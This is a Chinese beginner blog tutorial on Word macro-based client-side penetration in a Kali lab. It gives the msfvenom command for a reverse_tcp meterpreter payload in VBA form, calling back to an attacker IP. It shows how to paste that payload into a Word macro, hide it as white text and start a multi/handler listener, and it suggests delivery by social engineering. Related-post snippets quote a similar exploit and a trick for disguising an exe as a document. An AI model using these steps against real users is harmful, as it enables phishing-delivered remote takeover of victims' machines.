基于word文档的客户端渗透(简单易懂,小白可学)

最新推荐文章于 2024-06-15 12:18:05 发布
最新推荐文章于 2024-06-15 12:18:05 发布
阅读量294 收藏 1
点赞数
文章标签: word powerpoint
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62803993/article/details/128766165
版权

基于word文档的客户端渗透

简介

VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。

构造一个包含宏病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或直接删除其他文件等。Word宏和其他样式存储在模版DOT文件中, 因此总是把Word文件转成模版,再将其存储为宏。


环境配置

攻击机:

kali:ip 192.168,。139.129

win10 2022版:ip 192.168.5.11

靶机:

win10 2015: ip 192.168.139.130

生成payload,设置本地监听

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.139.129 lport=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 5 -f vba-exe

img

分析生成的两个代码

img

第一个即为个即为payload代码,如下

img

打开另一台攻击机创建一个word文档

img

打开word文档设置宏与编辑文档与隐藏

设置宏

一、打开文档点击视图,即可看到宏

img

二、设置宏名与选择所在的文档

img

三、将原有的代码删除,复制粘贴我们在kali上获得的宏代码

img

四、在这里我们不要点击保存而是选择另存为

img

五、将payload复制粘贴到文档中并隐藏

img

隐藏:

将字体换成白色即可

img

打开另一个终端,打开msf进入multi/handler模块

命令:

msfconsole

use exploit/multi/handler

img

查看所需配置文件

img

配置文件

配置payload

命令:

set payload windows/meterpreter/reverse_tcp

img

设置用于接受从目标机弹回的shell

img

img

开始监听

命令:run

img

测试

现实中可以利用社会工程学上传,在这里由于靶机没有装WPS我就不演示了

茶十三
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
解析word文档,过程详细,易懂,代码可直接复用
12-11
此demo为解析word文档,过程详细,易懂,代码可直接复用
渗透测试-地基钓鱼篇-Word文档注入执行恶意宏(二十四)
qq_34801745的博客
12-17 2761
** 渗透测试-地基钓鱼篇-Word文档注入执行恶意宏(二十四) ** 作者:大余 时间:2020-12-16 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣,决定
渗透测试笔记】之【钓鱼姿势——exe伪装word文档(exe图标修改方法)】
AA8j的博客
07-06 4874
文件后缀倒序+图标伪装 加入icon图标: 提取icon图标工具:BeCyIconGrabber 加入icon图标工具:Restorator 2018 首先将exe拖入: 右键添加资源: 选择 图标,名称随便写: 拖入icon: 另存: 重命名py脚本: import os os.rename('shellcode.exe', 'x\u202excod.exe') 效果: ...
Kali渗透测试:使用Word宏病毒进行渗透攻击
澎湖Java架构师的博客
05-17 500
Kali渗透测试:使用宏病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。 构造一个包含宏病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或
【CyberSecurityLearning 71】DC系列之DC-2渗透测试WordPress)
_Co1a
04-18 728
目录 DC-2靶机渗透测试 一、实验环境 二、实验要求 三、渗透过程演示 flag1: flag2: flag3: flag4: final-flag: DC-2靶机渗透测试 一、实验环境 实验环境: kali2021:192.168.3.151/24(桥接到vmnet0) 靶机环境DC-2(桥接到vmnet0,MAC地址:00:0C:29:3F:B7:2B) 保证kali和DC-2在同一个网段 二、实验要求 靶机中一共有五个flag文件,我们需要找到它们,即可完成任务.
MSF里侦听模块的使用教程 exploit/multi/handler
热门推荐
qq_45249394的博客
11-25 1万+
标题关于MSF侦听模块的第一次使用 侦听模块exploit/multi/handler在使用这个模块的时候也被这个功能惊呆了,不管外网内网都能反弹shell,就是windows10的防火墙过不去,windows7的查不到,可能不更新的原因吧。如果想过墙只能自己加免杀的代码喽,反正我是还没学到呢。或者去百度shellter下载剥壳机自己加免杀的,有两个版本免费版和专业版,本人亲测免费版过不了wind...
基于office渗透(MS10-087 Office(word渗透攻击)
qq_62803993的博客
01-26 866
如果用户打开或预览特制的RTF电子邮件,则最严重的漏洞可能允许远程执行代码。成功利用这些漏洞中的任何一个的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。低版本的word版本会出现RTF文件漏洞。漏洞:microsoft word中的RTF分析器中的pFragments属性容易受到栈缓存区溢出攻击。
kali 单元07 渗透攻击
xiaoma920的博客
05-24 288
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。2、载入exploit/multi/browser/adobe_flash_hacking_team_uaf渗透模块,查看需要设置的参数并进行设置,启动模块。II: 检查apache2是否已经启动,没有则启动。
使用Metasploit生成Word文件对目标进行渗透测试
渗透测试
05-13 715
上一篇提到了使用恶意PDF对目标主机进行渗透测试,这次简单提一下使用word文件进行渗透攻击,没看过上一篇的可以看一下,了解下基本步骤 使用恶意PDF进行渗透测试 测试用例 描述 漏洞 microsoft word中的RTF分析器中的pFragments属性容易受到栈缓存区溢出攻击 受影响的系统 Microsoft Office XP SP,2003 SP3,2007 SP2,2010 x32,2010 x64,Microsoft Office for Mac 2011 生成恶意wo
解析word文档,过程详细,易懂,代码可直接复用.zip
04-20
android 源码学习. 资料部分来源于合法的互联网渠道收集和整理,供大家学习参考与交流。本人不对所涉及的版权问题或内容负法律责任。如有侵权,请通知本人删除。感谢CSDN官方提供大家交流的平台
基于C# 设计仓库管理系统源码+毕业论文WORD文档资料.zip
06-29
基于C# 设计仓库管理系统源码+毕业论文WORD文档资料: 摘要 在传统仓库管理过程中,表单填写与查询管理都非常的耗费人力物力,最后需要盘点或统计十分耗费时间和人力。同时由于采用手工操作,不可避免造成一些的错误...
财稅小白实战课简单易懂实践运用-视频教程网盘链接提取码下载.txt
12-18
本课程以简单易懂的方式,为您提供实践应用的财务和税务知识。通过实战案例,学习如何处理日常财务、纳税申报以及财务分析等方面的技能。不论您是否有相关经验,均可轻松掌握财税实务,从中受益匪浅。 视频大小:7G
编写第一个操作WORD文档的应用程序
$邋遢$小子$的渣渣
04-23 1336
一、相关软件的安装及编写前准备    安装方法1: 按照MSDN上介绍的方法安装。如下图      第一步:安装Visual Studio Tools for Office,这个软件在安装VS2005的时候可以选择安装的,一般的朋友在装VS2005的时候都是全部安装,所以不用再装了。    第二步:同样,Visual Studio Tools for Office 运行
用 document.readyState == "complete" 判断页面是否加载完成。
weixin_33786077的博客
03-29 388
传回XML 文件资料的目前状况。   基本语法 intState = xmlDocument.readyState;   说 明 这个属性是只读的,传回值有以下的可能: 0-UNINITIALIZED:XML 对象被产生,但没有任何文件被加载。 1-LOADING:加载程序进行中,但文件尚未开始解析。 2-LOADED:部分的文件已经加载且进行解析,但对象模型尚未生效。 3-INTERACTIVE...
客户端渗透之——基于Word文件格式的渗透攻击
冰河的专栏
01-24 1754
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633173 攻击机: Kali 192.168.175.128 靶机 WinXP 192.168.175.130 程序 Office 2003 1.生成Word文档 msfconsole use exploit/windows/fileformat/ms10_087...
重新认识Word —— 制作简历
qq_67693066的博客
06-10 483
重新认识word —— 制作简历
复制网页文字和图片到Word中-Word插件-大珩助手
Smangder的博客
06-12 322
Word大珩助手是一款功能丰富的Office Word插件,旨在提高用户在处理文档时的效率。它具有多种实用的功能,能够帮助用户轻松修改、优化和管理Word文件,从而打造出专业而精美的文档。2、可以将网页整体插入到Word中,可以手动选择,将选择的内容插入到Word中,都包含图片和文字,并能正常显示。1、对于不能复制的网页,可以尝试本插件的特殊格式-插入网页功能;
前端将Markdown文本转换为富文本显示/编辑,并保存为word文件
最新发布
rolling_kitten的博客
06-15 553
参考:https://www.wangeditor.com/ https://blog.csdn.net/weixin_43797577/article/details/138854324 插件: markdown-it @traptitech/markdown-it-katex markdown-it-link-attributes highlight.js @wangeditor/editor @wangeditor/editor-for-vue html-docx-js-typescript mark
poi-tl和poi操作word文档区别和优势劣势对比
05-27
由于 Poi-tl 是针对模板进行操作的库,因此使用起来相对于 Poi 来说更加简单易懂,尤其是对于没有过多操作 Word 文档经验的开发者来说。 3. 执行效率 Poi-tl 在对模板进行操作时会比 Poi 更加高效,因为模板相对于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值